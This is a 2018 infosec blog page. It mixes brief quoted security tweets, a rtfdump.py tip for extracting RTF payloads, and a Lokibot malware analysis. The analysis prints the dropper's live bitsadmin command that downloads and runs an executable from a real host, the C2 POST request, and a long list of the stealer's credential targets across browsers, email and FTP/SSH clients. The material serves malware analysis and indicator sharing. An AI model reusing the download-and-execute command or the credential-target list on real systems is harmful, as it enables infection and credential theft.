Sunday, April 22, 2018

Infosec quotes - ski

“...
The control unit of a Ski lift gondola in Austria was exposed to the internet, allowing you to start/stop/reverse it and even configure the steel cable tension!
...”


https://twitter.com/svblxyz/status/986968644310716417?s=21 

Thursday, April 19, 2018

Infosec quotes - Evernote clipper

“... Evernote Clipper collects so much data from the webpages you visit...”


https://twitter.com/vysecurity/status/987013176331067392?s=21

lokibot sample

Found by @neonprimetime from 4/10/2018
Subject Priority :Invoice, PL & BL(Validate and confirm for final payment)
Attachment L5643290HS.doc
MD5 Checksum 33c06f02d43545be1b8baa567775402d
https://www.reverse.it/sample/729fdbb4b840234dc48fd13770d6811908aac73d3e76228a9aa02a8f776d9cbf?environmentId=100
sending ip: 104.47.33.228 (outlook.com)

word doc is actually RTF that runs bitsadmin to download loki payload

cmd.exe /c bitsadmin /transfer sY /priority foreground http://tpreiastephenville.com/jazz.exe %USERPROFILE%\rW.exe && start %USERPROFILE%\rW.exe
md5,29BEE3FCCFE036A03281B7940718D38F
https://www.reverse.it/sample/a66f989e58ada2eff729ac2032ff71a159c521e7372373f4a1c1cf13f8ae2f0c?environmentId=100


it is lokibot (here's another example to compare:  https://pastebin.com/pArSzS01 )

-------------------------------
interesting network connections
-------------------------------
http posts to 216.222.194.136:80
POST /wp-content/along/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: alongsidecoach.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: E292D1AA
Content-Length: 159
Connection: close
..(.......ckav.ru.

--------------------------------
interesting in-memory strings
--------------------------------
0x4a0074 (55): http://alongsidecoach.com/wp-content/along/five/fre.php
0x2fd82e6 (26): Comodo\Dragon
0x2fd8302 (44): MapleStudio\ChromePlus
0x2fd8332 (26): Google\Chrome
0x2fd8396 (26): Titan Browser
0x2fd83be (40): Yandex\YandexBrowser
0x2fd83ea (40): Epic Privacy Browser
0x2fd8416 (28): CocCoc\Browser
0x2fd8446 (30): Comodo\Chromodo
0x2fd847a (26): Coowon\Coowon
0x2fd8496 (30): Mustang Browser
0x2fd84b6 (36): 360Browser\Browser
0x2fd84de (40): CatalinaGroup\Citrio
0x2fd850a (34): Google\Chrome SxS
0x2fd854e (44): \Opera\Opera Next\data
0x2fd857e (56): \Opera Software\Opera Stable
0x2fd85ba (102): \Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer
0x2fd8622 (104): \Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
0x2fd868e (24): vaultcli.dll
0x2fd86aa (19): VaultEnumerateItems
0x2fd86be (20): VaultEnumerateVaults
0x2fd86e2 (12): VaultGetItem
0x2fd86f2 (14): VaultOpenVault
0x2fd8702 (15): VaultCloseVault
0x2fd8712 (116): Software\Microsoft\Internet Explorer\IntelliForms\Storage2
0x2fd87b2 (92): Software\Microsoft\Internet Explorer\TypedURLs
0x2fd881a (84): SELECT encryptedUsername, encryptedPassword, formSubmitURL, hostname FROM moz_logins
0x2fd888e (17): encryptedUsername
0x2fd88a2 (17): encryptedPassword
0x2fd88b6 (28): %s\logins.json
0x2fd88d6 (22): %s\prefs.js
0x2fd88ee (34): %s\signons.sqlite
0x2fd8912 (22): signons.txt
0x2fd892a (24): signons2.txt
0x2fd8946 (24): signons3.txt
0x2fd8962 (62): %s\Mozilla\Firefox\profiles.ini
0x2fd89a2 (60): %s\Mozilla\Firefox\Profiles\%s
0x2fd89e2 (66): %s\Mozilla\SeaMonkey\profiles.ini
0x2fd8a2a (64): %s\Mozilla\SeaMonkey\Profiles\%s
0x2fd8a6e (58): %s\Flock\Browser\profiles.ini
0x2fd8aaa (56): %s\Flock\Browser\Profiles\%s
0x2fd8ae6 (54): %s\Thunderbird\profiles.ini
0x2fd8b1e (52): %s\Thunderbird\Profiles\%s
0x2fd8b56 (48): %s\K-Meleon\profiles.ini
0x2fd8b8a (28): %s\K-Meleon\%s
0x2fd8baa (64): %s\Comodo\IceDragon\profiles.ini
0x2fd8bf2 (62): %s\Comodo\IceDragon\Profiles\%s
0x2fd8c32 (92): %s\NETGATE Technologies\BlackHawk\profiles.ini
0x2fd8c92 (90): %s\NETGATE Technologies\BlackHawk\Profiles\%s
0x2fd8cee (46): %s\Postbox\profiles.ini
0x2fd8d1e (44): %s\Postbox\Profiles\%s
0x2fd8d52 (74): %s\8pecxstudios\Cyberfox\profiles.ini
0x2fd8da2 (72): %s\8pecxstudios\Cyberfox\Profiles\%s
0x2fd8df2 (94): %s\Moonchild Productions\Pale Moon\profiles.ini
0x2fd8e52 (92): %s\Moonchild Productions\Pale Moon\Profiles\%s
0x2fd8eb2 (50): %s\FossaMail\profiles.ini
0x2fd8ee6 (48): %s\FossaMail\Profiles\%s
0x2fd8f1a (150): %s\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}\data
0x2fd8ff6 (22): %s\nss3.dll
0x2fd901a (12): NSS_Shutdown
0x2fd902a (23): PK11_GetInternalKeySlot
0x2fd9042 (13): PK11_FreeSlot
0x2fd9052 (17): PK11_Authenticate
0x2fd9066 (15): PK11SDR_Decrypt
0x2fd9076 (22): PK11_CheckUserPassword
0x2fd908e (16): SECITEM_FreeItem
0x2fd90a2 (22): sqlite3.dll
0x2fd90ba (28): mozsqlite3.dll
0x2fd90ee (16): sqlite3_finalize
0x2fd9102 (12): sqlite3_step
0x2fd9112 (13): sqlite3_close
0x2fd9122 (19): sqlite3_column_text
0x2fd9136 (14): sqlite3_open16
0x2fd9146 (18): sqlite3_prepare_v2
0x2fd915a (15): sqlite3_prepare
0x2fd916a (28): CurrentVersion
0x2fd918a (64): SOFTWARE\Mozilla\Mozilla Firefox
0x2fd91d6 (20): %s\%s\Main
0x2fd91ee (34): Install Directory
0x2fd922a (72): SOFTWARE\Mozilla\Mozilla Thunderbird
0x2fd9276 (52): SOFTWARE\Mozilla\FossaMail
0x2fd92ae (48): SOFTWARE\Postbox\Postbox
0x2fd92e2 (44): SOFTWARE\Mozilla\Flock
0x2fd9312 (40): SOFTWARE\Flock\Flock
0x2fd934a (28): %ProgramW6432%
0x2fd936a (42): %s\NETGATE\Black Hawk
0x2fd9396 (52): SOFTWARE\Mozilla\Pale Moon
0x2fd93d2 (140): %s\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}
0x2fd9462 (34): SOFTWARE\K-Meleon
0x2fd949a (72): SOFTWARE\ComodoGroup\IceDragon\Setup
0x2fd94fa (64): SOFTWARE\8pecxstudios\Cyberfox86
0x2fd953e (60): SOFTWARE\8pecxstudios\Cyberfox
0x2fd957e (60): SOFTWARE\mozilla.org\SeaMonkey
0x2fd95be (38): %s\Mozilla\Profiles
0x2fd95ee (52): SOFTWARE\Mozilla\SeaMonkey
0x2fd9626 (50): SOFTWARE\Mozilla\Waterfox
0x2fd9672 (22): firefox.exe
0x2fd9696 (24): kernel32.dll
0x2fd96b2 (11): CloseHandle
0x2fd96be (11): CreateFileW
0x2fd96d6 (11): ExitProcess
0x2fd96e2 (22): Crypt32.dll
0x2fd96fa (20): CryptStringToBinaryA
0x2fd9712 (22): Shlwapi.dll
0x2fd9732 (14): GetProcAddress
0x2fd9742 (12): LoadLibraryW
0x2fd977a (39): X!2$6*9(SKiasb+!v<.qF58_qwe~QsRTYvdeTYb
0x2fd97a2 (42): form_password_control
0x2fd97ce (42): form_username_control
0x2fd97fa (108): Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete
0x2fd986a (84): %s\QupZilla\profiles\default\browsedata.db
0x2fd98ee (20): InstallDir
0x2fd990a (72): SOFTWARE\Apple Computer, Inc.\Safari
0x2fd995a (88): %s\Apple Computer\Preferences\keychain.plist
0x2fd99ba (78): %s\Apple Application Support\plutil.exe
0x2fd9a16 (54): -convert xml1 -s -o %s "%s"
0x2fd9a4e (56): %s\Data\AccCfg\Accounts.tdat
0x2fd9a8a (20): %s\Storage
0x2fd9aa2 (24): Account.rec0
0x2fd9abe (30): %s\Foxmail\mail
0x2fd9aea (26): %SYSTEMDRIVE%
0x2fd9b1a (24): EmailAddress
0x2fd9b36 (20): Technology
0x2fd9b72 (20): PopAccount
0x2fd9b8a (22): PopPassword
0x2fd9ba2 (20): SmtpServer
0x2fd9bce (22): SmtpAccount
0x2fd9be6 (24): SmtpPassword
0x2fd9c02 (62): Software\IncrediMail\Identities
0x2fd9c66 (20): POP3Server
0x2fd9c9e (36): SMTP Email Address
0x2fd9cc6 (22): SMTP Server
0x2fd9cde (28): SMTP User Name
0x2fd9d12 (22): POP3 Server
0x2fd9d2a (28): POP3 User Name
0x2fd9d5e (36): NNTP Email Address
0x2fd9d86 (28): NNTP User Name
0x2fd9da6 (22): NNTP Server
0x2fd9dbe (22): IMAP Server
0x2fd9dd6 (28): IMAP User Name
0x2fd9e1e (30): HTTP Server URL
0x2fd9e3e (36): HTTPMail User Name
0x2fd9e66 (30): HTTPMail Server
0x2fd9ec2 (28): POP3 Password2
0x2fd9ee2 (28): IMAP Password2
0x2fd9f02 (28): NNTP Password2
0x2fd9f22 (36): HTTPMail Password2
0x2fd9f4a (28): SMTP Password2
0x2fd9f6a (26): POP3 Password
0x2fd9f86 (26): IMAP Password
0x2fd9fa2 (26): NNTP Password
0x2fd9fbe (26): HTTP Password
0x2fd9fda (26): SMTP Password
0x2fd9ffa (178): Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
0x2fda0b2 (110): Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
0x2fda122 (110): Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
0x2fda192 (30): %s\32BitFtp.TMP
0x2fda1b2 (30): %s\32BitFtp.ini
0x2fda1d2 (54): %s\Estsoft\ALFTP\ESTdb2.dat
0x2fda20a (22): %s\site.xml
0x2fda222 (46): %s\BitKinex\bitkinex.ds
0x2fda26e (30): LastUsedProfile
0x2fda28e (56): Software\Bitvise\BvSshClient
0x2fda2ca (40): %s\BlazeFtp\site.dat
0x2fda2fa (72): Software\FlashPeak\BlazeFtp\Settings
0x2fda346 (24): LastPassword
0x2fda376 (22): LastAddress
0x2fda3da (88): Software\NCH Software\ClassicFTP\FTPAccounts
0x2fda456 (24): %s\Cyberduck
0x2fda472 (22): user.config
0x2fda48a (30): %s\iterate_GmbH
0x2fda4aa (30): %s\EasyFTP\data
0x2fda4f2 (26): %s\ExpanDrive
0x2fda50e (26): *favorites.js
0x2fda56a (60): Software\Far\Plugins\FTP\Hosts
0x2fda5aa (62): Software\Far2\Plugins\FTP\Hosts
0x2fda5ea (148): %s\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
0x2fda682 (52): %s\FileZilla\Filezilla.xml
0x2fda6ba (52): %s\FileZilla\filezilla.xml
0x2fda6f2 (60): %s\FileZilla\recentservers.xml
0x2fda732 (56): %s\FileZilla\sitemanager.xml
0x2fda76e (22): %s\FlashFXP
0x2fda786 (20): *Sites.dat
0x2fda79e (20): *quick.dat
0x2fda7ca (22): FtpUserName
0x2fda7e2 (22): FtpPassword
0x2fda7fa (24): _FtpPassword
0x2fda81a (72): Software\NCH Software\Fling\Accounts
0x2fda86a (78): %s\FreshWebmaster\FreshFTP\FtpSites.SMF
0x2fda8ba (46): %s\FTPBox\profiles.conf
0x2fda8ea (64): %s\FTPGetter\Profile\servers.xml
0x2fda92e (48): %s\FTPGetter\servers.xml
0x2fda962 (50): %s\FTPInfo\ServerList.xml
0x2fda996 (50): %s\FTPInfo\ServerList.cfg
0x2fda9ca (56): %s\FTP Navigator\Ftplist.txt
0x2fdaa06 (40): %s\FTP Now\sites.xml
0x2fdaa32 (48): %s\FTPShell\ftpshell.fsi
0x2fdaa6a (64): %s\.config\fullsync\profiles.xml
0x2fdaaae (44): %s\DeluxeFTP\sites.xml
0x2fdaae2 (66): %s\GoFTP\settings\Connections.txt
0x2fdab5a (36): %s\%s%i\encPwd.jsd
0x2fdab82 (78): %s\%s%i\data\settings\sshProfiles-j.jsd
0x2fdabd2 (78): %s\%s%i\data\settings\ftpProfiles-j.jsd
0x2fdac46 (60): Software\LinasFTP\Site Manager
0x2fdac86 (52): %s\oZone3D\MyFTP\myftp.ini
0x2fdacbe (46): %s\NetDrive\NDSites.ini
0x2fdacee (46): %s\NetDrive2\drives.dat
0x2fdad22 (64): %s\Fastream NETFile\My FTP Links
0x2fdad6a (66): %s\NexusFile\userdata\ftpsite.ini
0x2fdadae (48): %s\NexusFile\ftpsite.ini
0x2fdade2 (64): %s\INSoftware\NovaFTP\NovaFTP.db
0x2fdae2a (90): %s\Notepad++\plugins\config\NppFTP\NppFTP.xml
0x2fdae8a (78): %s\Odin Secure FTP Expert\QFDefault.QFQ
0x2fdaeda (76): %s\Odin Secure FTP Expert\SiteInfo.QFP
0x2fdaf2a (26): PublicKeyFile
0x2fdaf46 (24): TerminalType
0x2fdaf62 (20): PortNumber
0x2fdaf7a (64): Software\9bis.com\KiTTY\Sessions
0x2fdafc2 (70): Software\SimonTatham\PuTTY\Sessions
0x2fdb026 (20): lsasrv.dll
0x2fdb03e (22): LsaICryptUnprotectData
0x2fdb072 (48): %s\Microsoft\Credentials
0x2fdb0a6 (22): Config Path
0x2fdb0be (50): Software\VanDyke\SecureFX
0x2fdb0f2 (22): %s\Sessions
0x2fdb13a (30): %s\SftpNetDrive
0x2fdb16a (84): %s\Sherrod Computers\sherrod FTP\favorites
0x2fdb1c2 (52): #document.favoriteManager*
0x2fdb1fa (22): %s\SmartFTP
0x2fdb222 (44): %s\Staff-FTP\sites.ini
0x2fdb252 (44): %s\Steed\bookmarks.txt
0x2fdb282 (26): %s\SuperPutty
0x2fdb30a (20): {.:CRED:.}
0x2fdb356 (24): %s\Syncovery
0x2fdb372 (26): Syncovery.ini
0x2fdb38e (28): %s\wcx_ftp.ini
0x2fdb3ae (44): %s\GHISLER\wcx_ftp.ini
0x2fdb3de (20): FtpIniName
0x2fdb3fa (64): Software\Ghisler\Total Commander
0x2fdb43e (42): %s\UltraFXP\sites.xml
0x2fdb46a (60): %s\WinFtp Client\Favorites.dat
0x2fdb4aa (20): FSProtocol
0x2fdb4c2 (46): Software\Martin Prikryl
0x2fdb4f2 (40): %s\WS_FTP\WS_FTP.INI
0x2fdb51e (26): %s\WS_FTP.INI
0x2fdb53a (22): %s\Ipswitch
0x2fdb552 (20): ws_ftp.ini
0x2fdb56a (52): %s\NetSarang\Xftp\Sessions

rtfdump cut interesting section

rtfdump.py bla.rtf

scroll & find largest section that is closest to bottom

e.g. for example id#179 was the one i found

then run

rtfdump.py -s 179 -H bla.rtf

and you get some Hex & readable ascii
if you scroll, somewhere buried in there is the content you want

e.g. for example it might start at 0x970 and end at 0xA10

then run

rtfdump.py --cut 0x970:0xA10 -s 179 -H -d

and it'll display your plain ascii text of the payload you wanted to see!!!!

sweet

Infosec quotes - internet garbage

Good reminder why privileged accounts should have no internet access. Even basic browsing activities can lead to bad things.

“... You won't believe how much garbage normal web browsing brings into your network...”


https://twitter.com/securethisnow/status/986831856682262528?s=21

Infosec quotes - first step logs

Access to Logs is important for your security team to protect an org. Firewall, server, workstation , app logs, etc.

“... Can't hunt or detect what you can't see. Visibility is definitely a key first step ...”


https://twitter.com/vysecurity/status/986857519439142913?s=21

Infosec quotes - webex meeting RCE

Cisco Webex In-meeting Remote Code Execution on attendees.

“... submit a malicious .swf to a room full of attendees via the file sharing tool, then execute the code on all of the targeted machines...”


https://www.theregister.co.uk/2018/04/19/cisco_patch_webex/